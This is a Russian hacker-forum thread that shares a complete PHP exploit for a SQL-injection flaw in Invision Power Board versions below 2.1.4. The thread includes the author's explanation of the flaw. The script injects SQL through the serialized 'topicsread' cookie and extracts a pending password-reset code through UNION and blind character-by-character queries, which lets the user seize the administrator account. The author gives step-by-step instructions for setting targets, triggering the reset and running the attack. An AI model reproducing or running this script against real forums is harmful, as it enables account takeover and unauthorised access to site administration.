Форум АНТИЧАТ - IPB <2.1.4 Admin password SQL-injection Exploit

Нарыл я вот на _http://ru24-team.net/ сплойт их же производства.
По заявлению ru24-team он должен сбивать пароль заданного юзера... слойт на php, но у меня что-то не запахал...
Вот код:

PHP код:


		
			
<?

/*

                   ____   ________

 __________       /____ \/__   __ \

/__________ \_ _ // _  \ / /  /  \ \

\\______   \__ __ \/ / // /__/   / /

 \|       _/  |  \  / / \_____  / /

 ||    |   \  |  / / /_____ /  / /

 ||____|___/____/  \______/ \_/ /

 |_________/_____/\_______/\___/

    === - security team - ===



Invision Power Board < 2.1.4 Password change SQL-Injection Exploit

                          by roOstY

                      Ru24 Security Team

                    <= www.Ru24-Team.net =>

----

For example you can reset password for admin

(link to "forget Password" add ask to change this password.

At the end of exploit you get link to change admin password)

Working in all Invision Power Forum forum before 2.1.4

but you need good mysql version ;)

Greetz to Nitrex and Dukenn

Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other...

Before runing,you must setup some settings

WARNING: You must setup the CURL-module for PHP!

----

*/



/* In any case at first you need to change password to  $target if you can't understand that */

//   error_reporting(E_ALL);



   ############    Settings    ###########################################################



    $proxy="24.48.*.*:**"; ## - your socks 4/5-proxy



    $host="http://forum.***.lt";   ##  - target forum

    $login="********";             ##  - login to forum

    $password="*****";             ##  - pass to forum

    $cook_name="ibf_topicsread";   ##  - target cookie name (default: ibf_topicsread)

    $topic=22;                     ##  - any real topyc

    $target=1;                     ##  - id target to admin or other user  that you want to reset password

    #####

    #  At first you need to reset pasword for target user.

    #   For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password)

    ####

    $len=32;  ## 5 for salt        ## it's my

    $ver=1;                        ##  if not wor change to 2

    $cookie_file_path = "/tmp/cookie";    ## for my opinuion, you can to set other

    $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";

   ################################################################################



   $cookie="";



   echo "Login...";

   $url=$host."/index.php?act=Login&CODE=01&CookieDate=1";

   $reffer=$host."/index.php?act=Login&CODE=00";

   $post['UserName']=urlencode($login);

   $post['PassWord']=urlencode($password);

   $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,"");          ###### Login to the forum



   $cook=getcookiee($result);

   foreach ($cook as $k=>$v) { $cookie[$k]=$v;  }

   if (!strstr($result,$login)) {

        echo "error. Invalid Login or Password then Login\n";

        exit;

     }  else echo "done\n";



   echo "Redirecting to main page...";

   $url=$host.urldecode(ExtractString($result,$host,"\" "));

   $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");          ###### Redirect to the main page



   $cook=getcookiee($result);

   foreach ($cook as $k=>$v) { $cookie[$k]=$v;  }



    if (!strstr($result,$login)) {

        echo "error. Invalid Login or Password then Redirect\n";

        exit;

     }  else echo "done\n";

   $reffer=$url;





   echo "Going to Control Panel...";

   $url=$host."/index.php?act=UserCP&CODE=00";

   $reffer="";$agent="";

   $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");             ###### Go te the control panel

       $cook=getcookiee($result);

       foreach ($cook as $k=>$v) { $cookie[$k]=$v;  }



    if (!strstr($result,$login)) {

        echo "error. Invalid Login or Password then going to Control\n";

        exit;

     }    echo "done\n";







    echo "Get table prefix...";

          $arr[$topic]=1111111111;

          $arr['-1) andd']=$topic;



      $cookie_base="";

      foreach ( $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }



          $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr));

          unset($arr);



          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

          if (!(strstr($result,"Error"))) {

               echo "error. Target seems not vuln";

               exit;  }

          $pref=ExtractString($result,"SELECT * FROM ","topics");

          echo "done prefix: ".$pref."\n";



$al="";

echo "Checking Mysql version....";

$targval=explode(".",$target);

          $arr[$topic]=1111111111;

          $arr['-1) and @@version<4/*']=$topic;

          $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));

          unset($arr);

          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

          if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n";

              else { echo  "done Mysql ver < 4. We can use only dos\n";

                     exit;

            }

echo "Exploiting....";



           $sent='%61%3A%32%3A%7B%73%3A';

          if ($ver==1) $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";

                  else $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";



          $arr[$topic]=1111111111;

          $arr[$exp]=$topic;

          $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));

          unset($arr);

          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

          if (!strstr($result,"different number of columns"))            {

            echo "done\n";

            $vid=substr($result,strpos($result,"</a></span>")-32,32);

            echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n";

           } else {

             echo "bad  Can't find number of colums\n";

            }

echo "Checking Mysql version 2....";

$targval=explode(".",$target);

          $arr[$topic]=1111111111;

          $arr['-1) and @@version<4.1/*']=$topic;

          $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));

          unset($arr);

          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

          //echo $result;exit;

          if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n";

              else { echo  "done Mysql ver < 4.1. We can't use SUBSELECT\n";

                     exit;

            }

echo "Bruteforcing....\n";

      $val="";

for ($j=16;$j<=$len;$j++) {

     $a2=128;

     $a1=32;

    while (($a2-$a1)>=5) {

          $s=round(($a1+$a2)/2,0);

          echo $s;

          $arr[$topic]=1111111111;

          $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;

          $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));

          unset($arr);

          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

          if ((strstr($result,"Error"))) {

               echo "Error querry!\n";

               exit;

             }

          if (strstr($result,"showtopic")) $a2=$s; else $a1=$s;

     }

     for ($i=$a1;$i<=$a2;$i++) {

          echo $i;

          $arr[$topic]=1111111111;

          $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;

          $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));

          $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);

         // echo urlencode(serialize($arr)).$result;exit;

          if (strstr($result,"showtopic"))  {

              $val .= chr($i);

              echo " - Get_symb:[".$j."] ".chr($i)."\n";

              break;

            }

     }

 }

 echo "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n";



function getcookiee($result) {

   $res = explode("\n",$result);

   foreach ($res as $k=>$v ) {

    if (ereg("Set-Cookie",$v)) {

      $c_a = explode(";",trim(str_replace("Set-Cookie:","",$v)));

      foreach ($c_a as $k=>$v ) {

              if (!(ereg("expires",$v))) {

               $arr=explode("=",trim($v));

               $cook[trim($arr[0])]=trim($arr[1]);

              }

          }

    }

  }

return $cook;

}

function querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {

       $ch = curl_init ();

       curl_setopt ($ch, CURLOPT_URL, $url);

       curl_setopt($ch, CURLOPT_USERAGENT, $agent);

       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,  0);

       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

       if ($post!="") {

                curl_setopt($ch, CURLOPT_POST, 1);

                curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

             }

       curl_setopt ($ch, CURLOPT_TIMEOUT, 120);

       curl_setopt ($ch, CURLOPT_PROXY, $proxy);

       curl_setopt ($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);

       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);

       curl_setopt ($ch, CURLOPT_FAILONERROR, false);

       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);

       curl_setopt($ch, CURLOPT_REFERER, $reffer);



       if ($cookie!="")

                       curl_setopt($ch, CURLOPT_COOKIE, $cookie);

//                   else {

                        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);

                        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);

//                        }

       curl_setopt($ch, CURLOPT_HEADER, 1);

       $result = curl_exec($ch);

       $error=curl_errno($ch);

       curl_close ($ch);

       if ($error) $result="Fucking Error: ".$error."\r\n";

       if ($error==7) $result=$result." Failed to connect() to host or proxy.\r\n";

       if ($error==28) $result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";

       if ($error==22) $result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";

       return $result;

}



function ExtractString($str, $start, $end) {

  $str_low = ($str);

  if (strpos($str_low, $start) !== false && strpos($str_low, $end, strpos($str_low, $start)) !== false) {

   $pos1 = strpos($str_low, $start) + strlen($start);

   $pos2 = strpos($str_low, $end,strpos($str_low, $start)) - $pos1;

   return substr($str, $pos1, $pos2);

  }

}

?>

Настройки я поменял... все точно. php5-curl поставил, а оно мне только:
Loading...
И все...
Запускал через
[root@host]~/$php sploit.php
Loading...[root@host]~/$
И все.

У кого какие идеи?

По многочисленным просьбам решил описать суть уязвимости, используемой эксплоитом, как пользоваться эксплоитом, а так же почему эксплоит может не срабатывать.

Уязвимость в виде sql-injection в форуме Invision Power Board была найдена в начале января, (точнее даже две, но одна некритическая в календаре, и адвис на нее был опубликован чуть раньше http://ru24-team.net/advisories/ru24_ipb213.txt ) и в то вребя работала на всех версиях форума ИПБ.
Уязвимость касалась неправильной обработки массива, в параметрах cookie.
Переменная topicsread в куках, попадает в массив, который соответствующим образом обрабатывается, но проверка на правильность ввода отсутствует.
Переменная topicsread содержит в себе список просмотренных тем и выглядит примерно так:
topicsread=a%3A1%3A%7Bi%3A5%3Bi%3A1140956642%3B%7D ;
Данная переменная используется в нескольких разных местах форума, но реализовать эксплоит для этой уязвимости удалось только в Панели Управления пользователя. Для того, чтобы попасть в Панель управленя необходимо сперва зарегистрироваться на форуме и в эксплоите подставить соответствующие значения логина и пароля на форум.
Попробуйте просмотреть любой топик на форуме, после этого зайти в Панель Управления и у вас появится список Recently Read Topics (Недавно Прочитаные Сообщения). Вот этот список как раз и содержит переменная topicsread, точнее айди топиков из базы, что можно увидет применив функцию php unserialize():
$ser=unserialize(urldecode("a%3A1%3A%7Bi%3A5%3Bi%3 A1140956642%3B%7D"));
foreach ($ser as $k=>$v) echo $k.":".$v."<br>";
В итоге получим:
5:1140956642
Это означает, что я смотрел тему под номером 5. 1140956642 - время, когда я смотрел тему, в юникс формате. При разборе этого массива айди темы не фильтруется и попадает вместе с запросом в базу то, что мы туда вставим.
Не забываем после просмотра топика вставить его айди в эксплоит. Т.е. здесь $topic необходимо установить в 3.
Но реализация данной уязвимости оказалось нетривиальной, т.к. по стандартной методике было очень сложно отследить, выполняется ли условие в поле юнион или там ошибка.
Основная проблема при реализации эксплоита - то что очень трудно отличить различные запросы к базе. т.е. подзапрос с условием where 1=1 и where 1=2 часто возвращает совершенно одинаковую страницу - и это пожалуй единственная причина (кроме естественно патчей), по которой эксплоит не срабатывает на некоторых форумах. Такое поведение зависит от версии форума и от версии базы данных. (может и от других - невыявленных мной факторов).
Кроме того необходимо помнить, что имя переменной topicsread опционально, т.е. задается администратором при настройке форума.
Написаный мной эксплоит старается получить из базы код, который необходим для изменения пароля пользователя. Естественно, чтобы этот код появился в базе, необходимо инициировать смену пароля, путем востановления забытого пароля. Т.е. вы выбираете, к какому пользователю вы хотите востановить пароль, к примеру пользователь admin с id=3 и административными правами. В эксплоите target необходимо установить в 3.
Далее идете на страницу ввода пароля и жмете на линк I've forgotten my password! Click here!. Заполняете необходимые поля и код для изменения пароля будет записан в базу, а так же выслан на емаил пользователя admin. После этого можно запускать эксплоит, который постарается узнать этот код, с помощью которого вы сможете изменить пароль пользователя admin. Если этот пользователь обладает административными правами, то нично не помешает нам зайти в Административную Панель Управления=).
При написании эксплоита я пошел двумя путями:
1 - подстановка своих значений через запрос union
Путем долгих исследований удалось определить набор полей которые должны участвовать в запресе union, чтобы вместо названия топика выдавался код, необходимый для востановления пароля. Но проблема в том, что в разных версиях форума, с разными дополнительными модулями - список полей может сильно различается. Поэтому эксплоит через юнион срабатыват только на дефолтной установке форума версии 2.1.3, и то не всегда. Зато теоретически должен срабатывать на всех версиях форума до 2.1.4 и при версии базы mysql 4.0 и выше.
2 - использование подзапросов
Подзабросы поддерживаются в mysql с версии 4.1, что резко сужает число успешных срабатываний, зато практически на любом форуме версии 2.*, стоящем на такой версии базы, можно получить код для подтверждения пароля. Данный код имеет длину 32 символа и в данном случае подбирается посимвольно. Причем для подбора одного символа требуется от 5 до 9 запросов к форуму. Поэтому в зависимости от скорости соединения необходимо от 2 до 20 минут для получения необходимого кода.

ну вот вроде и все. Если что непонятно, то попробуйте разобраться в коде эксплоита, а потом задать вопросы на форуме.

ЗЫ: В интернете могут встретиться различные версии эксплоита, например с реализацией только первого или только второго метода, или оба метода сразу.
(c)Автор сплойта.